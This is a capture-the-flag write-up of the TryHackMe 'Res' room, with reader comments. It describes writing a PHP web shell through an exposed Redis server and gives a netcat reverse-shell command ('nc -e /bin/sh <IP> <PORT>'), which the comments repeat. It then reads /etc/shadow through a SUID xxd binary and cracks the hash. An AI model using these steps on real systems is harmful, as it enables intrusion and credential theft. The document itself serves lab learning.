Introduction
This is my write-up for TryHackMe's Res Room.
Enumeration
Using nmap, I saw that this box 2 ports open.
Checking port 80, I found that it is running Apache.
Connecting to port 6379, we can perform several tasks such as getting the system info. Connecting via Telnet or netcat, we can run the "INFO" command to get the redis version, operating system, architecture, and more.
HackTricks provides an excellent example on how to get a shell on a Redis Server. According to it, we must first know the path of the web site folder. But since we know that the webserver is Apache, we assume that the path is /var/www/html. Using this assumption, we can then set the directory and write to a file. To test if it works, I wrote a simple PHP file to call phpinfo().
Checking the webpage, I found that it works.
I found that I could then run commands. Below is an example of running both the id and ifconfig commands.
Going back to the browser, and setting cmd equal to:
nc -e /bin/sh <IP> <PORT>
I find that there is a shell on my netcat listener.
Privilege Escalation
Looking for files whose SUID bit is set, I found that I can use xxd.
From GTFOBins, I found that I could read files that require higher privileges by using XXD. From this, I was able to read the contents of /etc/shadow.
Using john, I was able to crack the hash and get the user's password. Once I had the password, I was able to logon as the user. It turns out, that the user also had full sudo privileges.
Thanks for the write up. I never even thought of nc for access, I used a similar method after I installed redis-cli and your initial comments helped.
ReplyDeleteRegards
K
Glad it helped
Deletecan you explain more about
ReplyDeleteGoing back to the browser, and setting cmd equal to:
nc -e /bin/sh
DeleteSo once you’ve written commandshell.php on the target, you type the following on your browser:
/commandshell.php?cmd=nc -e /bin/sh
The “cmd” is actually the GET variable the PHP file would process.